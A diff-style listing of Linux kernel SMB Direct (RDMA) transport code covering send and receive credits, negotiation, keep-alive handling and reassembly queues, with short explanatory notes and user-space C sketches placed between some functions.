+-static void smbd_post_send_credits(struct work_struct *work)
+-{
+-	int ret = 0;
+-	int use_receive_queue = 1;
+-	int rc;
+-	struct smbd_response *response;
+-	struct smbd_connection *info =
+-		container_of(work, struct smbd_connection,
+-			post_send_credits_work);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		wake_up(&info->wait_receive_queues);
+-		return;
+-	}
+-
+-	if (info->receive_credit_target >
+-		atomic_read(&info->receive_credits)) {
+-		while (true) {
+-			if (use_receive_queue)
+-				response = get_receive_buffer(info);
+-			else
+-				response = get_empty_queue_buffer(info);
+-			if (!response) {
+-				/* now switch to empty packet queue */
+-				if (use_receive_queue) {
+-					use_receive_queue = 0;
+-					continue;
+-				} else
+-					break;
+-			}
+-
+-			response->type = SMBD_TRANSFER_DATA;
+-			response->first_segment = false;
+-			rc = smbd_post_recv(info, response);
+-			if (rc) {
+-				log_rdma_recv(ERR,
+-					"post_recv failed rc=%d\n", rc);
+-				put_receive_buffer(info, response);
+-				break;
+-			}
+-
+-			ret++;
+-		}
+-	}
+-
+-	spin_lock(&info->lock_new_credits_offered);
+-	info->new_credits_offered += ret;
+-	spin_unlock(&info->lock_new_credits_offered);
+-
+-	/* Promptly send an immediate packet as defined in [MS-SMBD] 3.1.1.1 */
+-	info->send_immediate = true;
+-	if (atomic_read(&info->receive_credits) <
+-		info->receive_credit_target - 1) {
+-		if (info->keep_alive_requested == KEEP_ALIVE_PENDING ||
+-		    info->send_immediate) {
+-			log_keep_alive(INFO, "send an empty message\n");
+-			smbd_post_send_empty(info);
+-		}
+-	}
+-}
+-
+-/* Called from softirq, when recv is done */
+-static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
+-{
+-	struct smbd_data_transfer *data_transfer;
+-	struct smbd_response *response =
+-		container_of(wc->wr_cqe, struct smbd_response, cqe);
+-	struct smbd_connection *info = response->info;
+-	int data_length = 0;
+-
+-	log_rdma_recv(INFO, "response=0x%p type=%d wc status=%d wc opcode %d byte_len=%d pkey_index=%u\n",
+-		      response, response->type, wc->status, wc->opcode,
+-		      wc->byte_len, wc->pkey_index);
+-
+-	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
+-		log_rdma_recv(INFO, "wc->status=%d opcode=%d\n",
+-			wc->status, wc->opcode);
+-		smbd_disconnect_rdma_connection(info);
+-		goto error;
+-	}
+-
+-	ib_dma_sync_single_for_cpu(
+-		wc->qp->device,
+-		response->sge.addr,
+-		response->sge.length,
+-		DMA_FROM_DEVICE);
+-
+-	switch (response->type) {
+-	/* SMBD negotiation response */
+-	case SMBD_NEGOTIATE_RESP:
+-		dump_smbd_negotiate_resp(smbd_response_payload(response));
+-		info->full_packet_received = true;
+-		info->negotiate_done =
+-			process_negotiation_response(response, wc->byte_len);
+-		complete(&info->negotiate_completion);
+-		break;
+-
+-	/* SMBD data transfer packet */
+-	case SMBD_TRANSFER_DATA:
+-		data_transfer = smbd_response_payload(response);
+-		data_length = le32_to_cpu(data_transfer->data_length);
+-
+-		/*
+-		 * If this is a packet with a data payload, place the data in
+-		 * reassembly queue and wake up the reading thread
+-		 */
+-		if (data_length) {
+-			if (info->full_packet_received)
+-				response->first_segment = true;
+-
+-			if (le32_to_cpu(data_transfer->remaining_data_length))
+-				info->full_packet_received = false;
+-			else
+-				info->full_packet_received = true;
+-
+-			enqueue_reassembly(
+-				info,
+-				response,
+-				data_length);
+-		} else
+-			put_empty_packet(info, response);
+-
+-		if (data_length)
+-			wake_up_interruptible(&info->wait_reassembly_queue);
+-
+-		atomic_dec(&info->receive_credits);
+-		info->receive_credit_target =
+-			le16_to_cpu(data_transfer->credits_requested);
+-		if (le16_to_cpu(data_transfer->credits_granted)) {
+-			atomic_add(le16_to_cpu(data_transfer->credits_granted),
+-				&info->send_credits);
+-			/*
+-			 * We have new send credits granted from remote peer
+-			 * If any sender is waiting for credits, unblock it
+-			 */
+-			wake_up_interruptible(&info->wait_send_queue);
+-		}
+-
+-		log_incoming(INFO, "data flags %d data_offset %d data_length %d remaining_data_length %d\n",
+-			     le16_to_cpu(data_transfer->flags),
+-			     le32_to_cpu(data_transfer->data_offset),
+-			     le32_to_cpu(data_transfer->data_length),
+-			     le32_to_cpu(data_transfer->remaining_data_length));
+-
+-		/* Send a KEEP_ALIVE response right away if requested */
+-		info->keep_alive_requested = KEEP_ALIVE_NONE;
+-		if (le16_to_cpu(data_transfer->flags) &
+-				SMB_DIRECT_RESPONSE_REQUESTED) {
+-			info->keep_alive_requested = KEEP_ALIVE_PENDING;
+-		}
+-
+-		return;
+-
+-	default:
+-		log_rdma_recv(ERR,
+-			"unexpected response type=%d\n", response->type);
+-	}
+-
+-error:
+-	put_receive_buffer(info, response);
+-}
+-
+-static struct rdma_cm_id *smbd_create_id(
+-		struct smbd_connection *info,
+-		struct sockaddr *dstaddr, int port)
+-{
+-	struct rdma_cm_id *id;
+-	int rc;
+-	__be16 *sport;
+-
+-	id = rdma_create_id(&init_net, smbd_conn_upcall, info,
+-		RDMA_PS_TCP, IB_QPT_RC);
+-	if (IS_ERR(id)) {
+-		rc = PTR_ERR(id);
+-		log_rdma_event(ERR, "rdma_create_id() failed %i\n", rc);
+-		return id;
+-	}
+-
+-	if (dstaddr->sa_family == AF_INET6)
+-		sport = &((struct sockaddr_in6 *)dstaddr)->sin6_port;
+-	else
+-		sport = &((struct sockaddr_in *)dstaddr)->sin_port;
+-
+-	*sport = htons(port);
+-
+-	init_completion(&info->ri_done);
+-	info->ri_rc = -ETIMEDOUT;
+-
+-	rc = rdma_resolve_addr(id, NULL, (struct sockaddr *)dstaddr,
+-		RDMA_RESOLVE_TIMEOUT);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_addr() failed %i\n", rc);
+-		goto out;
+-	}
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
+-	/* e.g. if interrupted returns -ERESTARTSYS */
+-	if (rc < 0) {
+-		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
+-		goto out;
+-	}
+-	rc = info->ri_rc;
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_addr() completed %i\n", rc);
+-		goto out;
+-	}
+-
+-	info->ri_rc = -ETIMEDOUT;
+-	rc = rdma_resolve_route(id, RDMA_RESOLVE_TIMEOUT);
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_route() failed %i\n", rc);
+-		goto out;
+-	}
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->ri_done, msecs_to_jiffies(RDMA_RESOLVE_TIMEOUT));
+-	/* e.g. if interrupted returns -ERESTARTSYS */
+-	if (rc < 0)  {
+-		log_rdma_event(ERR, "rdma_resolve_addr timeout rc: %i\n", rc);
+-		goto out;
+-	}
+-	rc = info->ri_rc;
+-	if (rc) {
+-		log_rdma_event(ERR, "rdma_resolve_route() completed %i\n", rc);
+-		goto out;
+-	}
+-
+-	return id;
+-
+-out:
+-	rdma_destroy_id(id);
+-	return ERR_PTR(rc);
+-}
+-
+-/*
+- * Test if FRWR (Fast Registration Work Requests) is supported on the device
+- * This implementation requires FRWR for RDMA read/write
+- * return value: true if it is supported
+- */
+-static bool frwr_is_supported(struct ib_device_attr *attrs)
+-{
+-	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
+-		return false;
+-	if (attrs->max_fast_reg_page_list_len == 0)
+-		return false;
+-	return true;
+-}
+-
+-static int smbd_ia_open(
+-		struct smbd_connection *info,
+-		struct sockaddr *dstaddr, int port)
+-{
+-	int rc;
+-
+-	info->id = smbd_create_id(info, dstaddr, port);
+-	if (IS_ERR(info->id)) {
+-		rc = PTR_ERR(info->id);
+-		goto out1;
+-	}
+-
+-	if (!frwr_is_supported(&info->id->device->attrs)) {
+-		log_rdma_event(ERR, "Fast Registration Work Requests (FRWR) is not supported\n");
+-		log_rdma_event(ERR, "Device capability flags = %llx max_fast_reg_page_list_len = %u\n",
+-			       info->id->device->attrs.device_cap_flags,
+-			       info->id->device->attrs.max_fast_reg_page_list_len);
+-		rc = -EPROTONOSUPPORT;
+-		goto out2;
+-	}
+-	info->max_frmr_depth = min_t(int,
+-		smbd_max_frmr_depth,
+-		info->id->device->attrs.max_fast_reg_page_list_len);
+-	info->mr_type = IB_MR_TYPE_MEM_REG;
+-	if (info->id->device->attrs.kernel_cap_flags & IBK_SG_GAPS_REG)
+-		info->mr_type = IB_MR_TYPE_SG_GAPS;
+-
+-	info->pd = ib_alloc_pd(info->id->device, 0);
+-	if (IS_ERR(info->pd)) {
+-		rc = PTR_ERR(info->pd);
+-		log_rdma_event(ERR, "ib_alloc_pd() returned %d\n", rc);
+-		goto out2;
+-	}
+-
+-	return 0;
+-
+-out2:
+-	rdma_destroy_id(info->id);
+-	info->id = NULL;
+-
+-out1:
+-	return rc;
+-}
+-
+-/*
+- * Send a negotiation request message to the peer
+- * The negotiation procedure is in [MS-SMBD] 3.1.5.2 and 3.1.5.3
+- * After negotiation, the transport is connected and ready for
+- * carrying upper layer SMB payload
+- */
+-static int smbd_post_send_negotiate_req(struct smbd_connection *info)
+-{
+-	struct ib_send_wr send_wr;
+-	int rc = -ENOMEM;
+-	struct smbd_request *request;
+-	struct smbd_negotiate_req *packet;
+-
+-	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
+-	if (!request)
+-		return rc;
+-
+-	request->info = info;
+-
+-	packet = smbd_request_payload(request);
+-	packet->min_version = cpu_to_le16(SMBD_V1);
+-	packet->max_version = cpu_to_le16(SMBD_V1);
+-	packet->reserved = 0;
+-	packet->credits_requested = cpu_to_le16(info->send_credit_target);
+-	packet->preferred_send_size = cpu_to_le32(info->max_send_size);
+-	packet->max_receive_size = cpu_to_le32(info->max_receive_size);
+-	packet->max_fragmented_size =
+-		cpu_to_le32(info->max_fragmented_recv_size);
+-
+-	request->num_sge = 1;
+-	request->sge[0].addr = ib_dma_map_single(
+-				info->id->device, (void *)packet,
+-				sizeof(*packet), DMA_TO_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
+-		rc = -EIO;
+-		goto dma_mapping_failed;
+-	}
+-
+-	request->sge[0].length = sizeof(*packet);
+-	request->sge[0].lkey = info->pd->local_dma_lkey;
+-
+-	ib_dma_sync_single_for_device(
+-		info->id->device, request->sge[0].addr,
+-		request->sge[0].length, DMA_TO_DEVICE);
+-
+-	request->cqe.done = send_done;
+-
+-	send_wr.next = NULL;
+-	send_wr.wr_cqe = &request->cqe;
+-	send_wr.sg_list = request->sge;
+-	send_wr.num_sge = request->num_sge;
+-	send_wr.opcode = IB_WR_SEND;
+-	send_wr.send_flags = IB_SEND_SIGNALED;
+-
+-	log_rdma_send(INFO, "sge addr=0x%llx length=%u lkey=0x%x\n",
+-		request->sge[0].addr,
+-		request->sge[0].length, request->sge[0].lkey);
+-
+-	atomic_inc(&info->send_pending);
+-	rc = ib_post_send(info->id->qp, &send_wr, NULL);
+-	if (!rc)
+-		return 0;
+-
+-	/* if we reach here, post send failed */
+-	log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
+-	atomic_dec(&info->send_pending);
+-	ib_dma_unmap_single(info->id->device, request->sge[0].addr,
+-		request->sge[0].length, DMA_TO_DEVICE);
+-
+-	smbd_disconnect_rdma_connection(info);
+-
+-dma_mapping_failed:
+-	mempool_free(request, info->request_mempool);
+-	return rc;
+-}
+-
+-/*
+- * Extend the credits to remote peer
+- * This implements [MS-SMBD] 3.1.5.9
+- * The idea is that we should extend credits to remote peer as quickly as
+- * it's allowed, to maintain data flow. We allocate as many receive
+- * buffers as possible, and extend the receive credits to the remote peer.
+- * return value: the new credits being granted.
+- */
+-static int manage_credits_prior_sending(struct smbd_connection *info)
+-{
+-	int new_credits;
+-
+-	spin_lock(&info->lock_new_credits_offered);
+-	new_credits = info->new_credits_offered;
+-	info->new_credits_offered = 0;
+-	spin_unlock(&info->lock_new_credits_offered);
+-
+-	return new_credits;
+-}
+-
+-/*
+- * Check if we need to send a KEEP_ALIVE message
+- * The idle connection timer triggers a KEEP_ALIVE message when it expires.
+- * SMB_DIRECT_RESPONSE_REQUESTED is set in the message flags to have the peer
+- * send back a response.
+- * return value:
+- * 1 if SMB_DIRECT_RESPONSE_REQUESTED needs to be set
+- * 0: otherwise
+- */
+-static int manage_keep_alive_before_sending(struct smbd_connection *info)
+-{
+-	if (info->keep_alive_requested == KEEP_ALIVE_PENDING) {
+-		info->keep_alive_requested = KEEP_ALIVE_SENT;
+-		return 1;
+-	}
+-	return 0;
+-}
+-
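The keep-alive flag is effectively a three-state machine: a peer's SMB_DIRECT_RESPONSE_REQUESTED sets PENDING, the next outgoing packet carries the response flag and moves it to SENT, and a received reply resets it to NONE. A sketch of the pre-send transition above:

#include <stdio.h>

enum keep_alive { KEEP_ALIVE_NONE, KEEP_ALIVE_PENDING, KEEP_ALIVE_SENT };

/* Returns nonzero when the outgoing packet must request a peer response. */
static int keep_alive_before_sending(enum keep_alive *state)
{
	if (*state == KEEP_ALIVE_PENDING) {
		*state = KEEP_ALIVE_SENT;
		return 1;
	}
	return 0;
}

int main(void)
{
	enum keep_alive st = KEEP_ALIVE_PENDING;

	printf("request response=%d, now SENT=%d\n",
	       keep_alive_before_sending(&st), st == KEEP_ALIVE_SENT);
	printf("second send requests nothing: %d\n",
	       keep_alive_before_sending(&st));
	return 0;
}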
+-/* Post the send request */
+-static int smbd_post_send(struct smbd_connection *info,
+-		struct smbd_request *request)
+-{
+-	struct ib_send_wr send_wr;
+-	int rc, i;
+-
+-	for (i = 0; i < request->num_sge; i++) {
+-		log_rdma_send(INFO,
+-			"rdma_request sge[%d] addr=0x%llx length=%u\n",
+-			i, request->sge[i].addr, request->sge[i].length);
+-		ib_dma_sync_single_for_device(
+-			info->id->device,
+-			request->sge[i].addr,
+-			request->sge[i].length,
+-			DMA_TO_DEVICE);
+-	}
+-
+-	request->cqe.done = send_done;
+-
+-	send_wr.next = NULL;
+-	send_wr.wr_cqe = &request->cqe;
+-	send_wr.sg_list = request->sge;
+-	send_wr.num_sge = request->num_sge;
+-	send_wr.opcode = IB_WR_SEND;
+-	send_wr.send_flags = IB_SEND_SIGNALED;
+-
+-	rc = ib_post_send(info->id->qp, &send_wr, NULL);
+-	if (rc) {
+-		log_rdma_send(ERR, "ib_post_send failed rc=%d\n", rc);
+-		smbd_disconnect_rdma_connection(info);
+-		rc = -EAGAIN;
+-	} else
+-		/* Reset timer for idle connection after packet is sent */
+-		mod_delayed_work(info->workqueue, &info->idle_timer_work,
+-			info->keep_alive_interval*HZ);
+-
+-	return rc;
+-}
+-
+-static int smbd_post_send_sgl(struct smbd_connection *info,
+-	struct scatterlist *sgl, int data_length, int remaining_data_length)
+-{
+-	int num_sgs;
+-	int i, rc;
+-	int header_length;
+-	struct smbd_request *request;
+-	struct smbd_data_transfer *packet;
+-	int new_credits;
+-	struct scatterlist *sg;
+-
+-wait_credit:
+-	/* Wait for send credits. A SMBD packet needs one credit */
+-	rc = wait_event_interruptible(info->wait_send_queue,
+-		atomic_read(&info->send_credits) > 0 ||
+-		info->transport_status != SMBD_CONNECTED);
+-	if (rc)
+-		goto err_wait_credit;
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_outgoing(ERR, "disconnected not sending on wait_credit\n");
+-		rc = -EAGAIN;
+-		goto err_wait_credit;
+-	}
+-	if (unlikely(atomic_dec_return(&info->send_credits) < 0)) {
+-		atomic_inc(&info->send_credits);
+-		goto wait_credit;
+-	}
+-
+-wait_send_queue:
+-	wait_event(info->wait_post_send,
+-		atomic_read(&info->send_pending) < info->send_credit_target ||
+-		info->transport_status != SMBD_CONNECTED);
+-
+-	if (info->transport_status != SMBD_CONNECTED) {
+-		log_outgoing(ERR, "disconnected not sending on wait_send_queue\n");
+-		rc = -EAGAIN;
+-		goto err_wait_send_queue;
+-	}
+-
+-	if (unlikely(atomic_inc_return(&info->send_pending) >
+-				info->send_credit_target)) {
+-		atomic_dec(&info->send_pending);
+-		goto wait_send_queue;
+-	}
+-
+-	request = mempool_alloc(info->request_mempool, GFP_KERNEL);
+-	if (!request) {
+-		rc = -ENOMEM;
+-		goto err_alloc;
+-	}
+-
+-	request->info = info;
+-
+-	/* Fill in the packet header */
+-	packet = smbd_request_payload(request);
+-	packet->credits_requested = cpu_to_le16(info->send_credit_target);
+-
+-	new_credits = manage_credits_prior_sending(info);
+-	atomic_add(new_credits, &info->receive_credits);
+-	packet->credits_granted = cpu_to_le16(new_credits);
+-
+-	info->send_immediate = false;
+-
+-	packet->flags = 0;
+-	if (manage_keep_alive_before_sending(info))
+-		packet->flags |= cpu_to_le16(SMB_DIRECT_RESPONSE_REQUESTED);
+-
+-	packet->reserved = 0;
+-	if (!data_length)
+-		packet->data_offset = 0;
+-	else
+-		packet->data_offset = cpu_to_le32(24);
+-	packet->data_length = cpu_to_le32(data_length);
+-	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
+-	packet->padding = 0;
+-
+-	log_outgoing(INFO, "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
+-		     le16_to_cpu(packet->credits_requested),
+-		     le16_to_cpu(packet->credits_granted),
+-		     le32_to_cpu(packet->data_offset),
+-		     le32_to_cpu(packet->data_length),
+-		     le32_to_cpu(packet->remaining_data_length));
+-
+-	/* Map the packet to DMA */
+-	header_length = sizeof(struct smbd_data_transfer);
+-	/* If this is a packet without payload, don't send padding */
+-	if (!data_length)
+-		header_length = offsetof(struct smbd_data_transfer, padding);
+-
+-	request->num_sge = 1;
+-	request->sge[0].addr = ib_dma_map_single(info->id->device,
+-						 (void *)packet,
+-						 header_length,
+-						 DMA_TO_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, request->sge[0].addr)) {
+-		rc = -EIO;
+-		request->sge[0].addr = 0;
+-		goto err_dma;
+-	}
+-
+-	request->sge[0].length = header_length;
+-	request->sge[0].lkey = info->pd->local_dma_lkey;
+-
+-	/* Fill in the packet data payload */
+-	num_sgs = sgl ? sg_nents(sgl) : 0;
+-	for_each_sg(sgl, sg, num_sgs, i) {
+-		request->sge[i+1].addr =
+-			ib_dma_map_page(info->id->device, sg_page(sg),
+-			       sg->offset, sg->length, DMA_TO_DEVICE);
+-		if (ib_dma_mapping_error(
+-				info->id->device, request->sge[i+1].addr)) {
+-			rc = -EIO;
+-			request->sge[i+1].addr = 0;
+-			goto err_dma;
+-		}
+-		request->sge[i+1].length = sg->length;
+-		request->sge[i+1].lkey = info->pd->local_dma_lkey;
+-		request->num_sge++;
+-	}
+-
+-	rc = smbd_post_send(info, request);
+-	if (!rc)
+-		return 0;
+-
+-err_dma:
+-	for (i = 0; i < request->num_sge; i++)
+-		if (request->sge[i].addr)
+-			ib_dma_unmap_single(info->id->device,
+-					    request->sge[i].addr,
+-					    request->sge[i].length,
+-					    DMA_TO_DEVICE);
+-	mempool_free(request, info->request_mempool);
+-
+-	/* roll back receive credits and credits to be offered */
+-	spin_lock(&info->lock_new_credits_offered);
+-	info->new_credits_offered += new_credits;
+-	spin_unlock(&info->lock_new_credits_offered);
+-	atomic_sub(new_credits, &info->receive_credits);
+-
+-err_alloc:
+-	if (atomic_dec_and_test(&info->send_pending))
+-		wake_up(&info->wait_send_pending);
+-
+-err_wait_send_queue:
+-	/* roll back send credits and pending */
+-	atomic_inc(&info->send_credits);
+-
+-err_wait_credit:
+-	return rc;
+-}
+-
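The credit handling at the top of smbd_post_send_sgl() is optimistic: decrement first, and if the counter went negative a racing sender won, so roll back and wait again. A user-space analogue with C11 atomics, where a busy-wait stands in for the kernel waitqueue:

#include <stdatomic.h>
#include <stdio.h>

static atomic_int send_credits = 2;

/* Take one send credit, mirroring the wait_credit retry loop above. */
static void take_credit(void)
{
	for (;;) {
		while (atomic_load(&send_credits) <= 0)
			;	/* the kernel sleeps on wait_send_queue here */
		/* fetch_sub returns the old value; old - 1 is the new count */
		if (atomic_fetch_sub(&send_credits, 1) - 1 >= 0)
			return;
		atomic_fetch_add(&send_credits, 1); /* lost the race; undo */
	}
}

int main(void)
{
	take_credit();
	take_credit();
	printf("credits left=%d\n", atomic_load(&send_credits)); /* 0 */
	return 0;
}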
+-/*
+- * Send a page
+- * page: the page to send
+- * offset: offset in the page to send
+- * size: length in the page to send
+- * remaining_data_length: remaining data to send in this payload
+- */
+-static int smbd_post_send_page(struct smbd_connection *info, struct page *page,
+-		unsigned long offset, size_t size, int remaining_data_length)
+-{
+-	struct scatterlist sgl;
+-
+-	sg_init_table(&sgl, 1);
+-	sg_set_page(&sgl, page, size, offset);
+-
+-	return smbd_post_send_sgl(info, &sgl, size, remaining_data_length);
+-}
+-
+-/*
+- * Send an empty message
+- * An empty message is used to extend credits to the peer for keep-alive
+- * while there is no upper layer payload to send at the time
+- */
+-static int smbd_post_send_empty(struct smbd_connection *info)
+-{
+-	info->count_send_empty++;
+-	return smbd_post_send_sgl(info, NULL, 0, 0);
+-}
+-
+-/*
+- * Send a data buffer
+- * iov: the iov array describing the data buffers
+- * n_vec: number of entries in the iov array
+- * remaining_data_length: remaining data to send following this packet
+- * in segmented SMBD packet
+- */
+-static int smbd_post_send_data(
+-	struct smbd_connection *info, struct kvec *iov, int n_vec,
+-	int remaining_data_length)
+-{
+-	int i;
+-	u32 data_length = 0;
+-	struct scatterlist sgl[SMBDIRECT_MAX_SEND_SGE - 1];
+-
+-	if (n_vec > SMBDIRECT_MAX_SEND_SGE - 1) {
+-		cifs_dbg(VFS, "Can't fit data to SGL, n_vec=%d\n", n_vec);
+-		return -EINVAL;
+-	}
+-
+-	sg_init_table(sgl, n_vec);
+-	for (i = 0; i < n_vec; i++) {
+-		data_length += iov[i].iov_len;
+-		sg_set_buf(&sgl[i], iov[i].iov_base, iov[i].iov_len);
+-	}
+-
+-	return smbd_post_send_sgl(info, sgl, data_length, remaining_data_length);
+-}
+-
+-/*
+- * Post a receive request to the transport
+- * The remote peer can only send data when a receive request is posted
+- * The interaction is controlled by the send/receive credit system
+- */
+-static int smbd_post_recv(
+-		struct smbd_connection *info, struct smbd_response *response)
+-{
+-	struct ib_recv_wr recv_wr;
+-	int rc = -EIO;
+-
+-	response->sge.addr = ib_dma_map_single(
+-				info->id->device, response->packet,
+-				info->max_receive_size, DMA_FROM_DEVICE);
+-	if (ib_dma_mapping_error(info->id->device, response->sge.addr))
+-		return rc;
+-
+-	response->sge.length = info->max_receive_size;
+-	response->sge.lkey = info->pd->local_dma_lkey;
+-
+-	response->cqe.done = recv_done;
+-
+-	recv_wr.wr_cqe = &response->cqe;
+-	recv_wr.next = NULL;
+-	recv_wr.sg_list = &response->sge;
+-	recv_wr.num_sge = 1;
+-
+-	rc = ib_post_recv(info->id->qp, &recv_wr, NULL);
+-	if (rc) {
+-		ib_dma_unmap_single(info->id->device, response->sge.addr,
+-				    response->sge.length, DMA_FROM_DEVICE);
+-		smbd_disconnect_rdma_connection(info);
+-		log_rdma_recv(ERR, "ib_post_recv failed rc=%d\n", rc);
+-	}
+-
+-	return rc;
+-}
+-
+-/* Perform SMBD negotiate according to [MS-SMBD] 3.1.5.2 */
+-static int smbd_negotiate(struct smbd_connection *info)
+-{
+-	int rc;
+-	struct smbd_response *response = get_receive_buffer(info);
+-
+-	response->type = SMBD_NEGOTIATE_RESP;
+-	rc = smbd_post_recv(info, response);
+-	log_rdma_event(INFO, "smbd_post_recv rc=%d iov.addr=0x%llx iov.length=%u iov.lkey=0x%x\n",
+-		       rc, response->sge.addr,
+-		       response->sge.length, response->sge.lkey);
+-	if (rc)
+-		return rc;
+-
+-	init_completion(&info->negotiate_completion);
+-	info->negotiate_done = false;
+-	rc = smbd_post_send_negotiate_req(info);
+-	if (rc)
+-		return rc;
+-
+-	rc = wait_for_completion_interruptible_timeout(
+-		&info->negotiate_completion, SMBD_NEGOTIATE_TIMEOUT * HZ);
+-	log_rdma_event(INFO, "wait_for_completion_timeout rc=%d\n", rc);
+-
+-	if (info->negotiate_done)
+-		return 0;
+-
+-	if (rc == 0)
+-		rc = -ETIMEDOUT;
+-	else if (rc == -ERESTARTSYS)
+-		rc = -EINTR;
+-	else
+-		rc = -ENOTCONN;
+-
+-	return rc;
+-}
+-
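The tail of smbd_negotiate() folds the completion-wait result into an errno only when negotiate_done is still false: 0 means the 120-second timer expired, -ERESTARTSYS means the wait was interrupted, anything else means the connection dropped. A sketch of that mapping (ERESTARTSYS is kernel-internal, so its value is hard-coded here):

#include <errno.h>
#include <stdio.h>

/* Map the wait return code to an error when negotiation did not finish. */
static int negotiate_errno(long wait_rc, int negotiate_done)
{
	if (negotiate_done)
		return 0;
	if (wait_rc == 0)
		return -ETIMEDOUT;	/* timer expired, no response */
	if (wait_rc == -512)		/* -ERESTARTSYS, kernel-internal */
		return -EINTR;
	return -ENOTCONN;		/* woken, but negotiation failed */
}

int main(void)
{
	printf("%d %d %d\n", negotiate_errno(0, 0),
	       negotiate_errno(-512, 0), negotiate_errno(3, 1));
	return 0;
}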
+-static void put_empty_packet(
+-		struct smbd_connection *info, struct smbd_response *response)
+-{
+-	spin_lock(&info->empty_packet_queue_lock);
+-	list_add_tail(&response->list, &info->empty_packet_queue);
+-	info->count_empty_packet_queue++;
+-	spin_unlock(&info->empty_packet_queue_lock);
+-
+-	queue_work(info->workqueue, &info->post_send_credits_work);
+-}
+-
+-/*
+- * Implement Connection.FragmentReassemblyBuffer defined in [MS-SMBD] 3.1.1.1
+- * This is a queue for reassembling upper layer payload and presenting it to
+- * the upper layer. All incoming payloads go to the reassembly queue,
+- * regardless of whether reassembly is required. The upper layer code reads
+- * from the queue for all incoming payloads.
+- * Put a received packet to the reassembly queue
+- * response: the packet received
+- * data_length: the size of payload in this packet
+- */
+-static void enqueue_reassembly(
+-	struct smbd_connection *info,
+-	struct smbd_response *response,
+-	int data_length)
+-{
+-	spin_lock(&info->reassembly_queue_lock);
+-	list_add_tail(&response->list, &info->reassembly_queue);
+-	info->reassembly_queue_length++;
+-	/*
+-	 * Make sure reassembly_data_length is updated after list and
+-	 * reassembly_queue_length are updated. On the dequeue side
+-	 * reassembly_data_length is checked without a lock to determine
+-	 * if reassembly_queue_length and list is up to date
+-	 */
+-	virt_wmb();
+-	info->reassembly_data_length += data_length;
+-	spin_unlock(&info->reassembly_queue_lock);
+-	info->count_reassembly_queue++;
+-	info->count_enqueue_reassembly_queue++;
+-}
+-
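The barrier comment above is the heart of the lock-free hand-off: the producer publishes the list update before bumping reassembly_data_length, and the reader in smbd_recv_buf() issues the matching read barrier before touching the queue. A C11 sketch of that pairing, with release/acquire fences standing in for virt_wmb()/virt_rmb():

#include <stdatomic.h>
#include <stdio.h>

struct queue {
	int length;		/* list state, written under the producer lock */
	atomic_int data_length;	/* checked lock-free by the reader */
};

static void producer_enqueue(struct queue *q, int bytes)
{
	q->length++;				   /* update queue state first */
	atomic_thread_fence(memory_order_release); /* ~ virt_wmb() */
	atomic_fetch_add_explicit(&q->data_length, bytes, memory_order_relaxed);
}

static int consumer_ready(struct queue *q, int want)
{
	if (atomic_load_explicit(&q->data_length, memory_order_relaxed) < want)
		return 0;
	atomic_thread_fence(memory_order_acquire); /* ~ virt_rmb() */
	return 1;	/* q->length and the list are now safe to read */
}

int main(void)
{
	struct queue q = { 0, 0 };

	producer_enqueue(&q, 512);
	printf("ready=%d length=%d\n", consumer_ready(&q, 4), q.length);
	return 0;
}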
+-/*
+- * Get the first entry at the front of reassembly queue
+- * Caller is responsible for locking
+- * return value: the first entry if any, NULL if queue is empty
+- */
+-static struct smbd_response *_get_first_reassembly(struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-
+-	if (!list_empty(&info->reassembly_queue)) {
+-		ret = list_first_entry(
+-			&info->reassembly_queue,
+-			struct smbd_response, list);
+-	}
+-	return ret;
+-}
+-
+-static struct smbd_response *get_empty_queue_buffer(
+-		struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&info->empty_packet_queue_lock, flags);
+-	if (!list_empty(&info->empty_packet_queue)) {
+-		ret = list_first_entry(
+-			&info->empty_packet_queue,
+-			struct smbd_response, list);
+-		list_del(&ret->list);
+-		info->count_empty_packet_queue--;
+-	}
+-	spin_unlock_irqrestore(&info->empty_packet_queue_lock, flags);
+-
+-	return ret;
+-}
+-
+-/*
+- * Get a receive buffer
+- * For each remote send, we need to post a receive. The receive buffers are
+- * pre-allocated in advance.
+- * return value: the receive buffer, NULL if none is available
+- */
+-static struct smbd_response *get_receive_buffer(struct smbd_connection *info)
+-{
+-	struct smbd_response *ret = NULL;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&info->receive_queue_lock, flags);
+-	if (!list_empty(&info->receive_queue)) {
+-		ret = list_first_entry(
+-			&info->receive_queue,
+-			struct smbd_response, list);
+-		list_del(&ret->list);
+-		info->count_receive_queue--;
+-		info->count_get_receive_buffer++;
+-	}
+-	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
+-
+-	return ret;
+-}
+-
+-/*
+- * Return a receive buffer
+- * Upon return of a receive buffer, we can post a new receive and extend
+- * more receive credits to the remote peer. This is done immediately after a
+- * receive buffer is returned.
+- */
+-static void put_receive_buffer(
+-	struct smbd_connection *info, struct smbd_response *response)
+-{
+-	unsigned long flags;
+-
+-	ib_dma_unmap_single(info->id->device, response->sge.addr,
+-		response->sge.length, DMA_FROM_DEVICE);
+-
+-	spin_lock_irqsave(&info->receive_queue_lock, flags);
+-	list_add_tail(&response->list, &info->receive_queue);
+-	info->count_receive_queue++;
+-	info->count_put_receive_buffer++;
+-	spin_unlock_irqrestore(&info->receive_queue_lock, flags);
+-
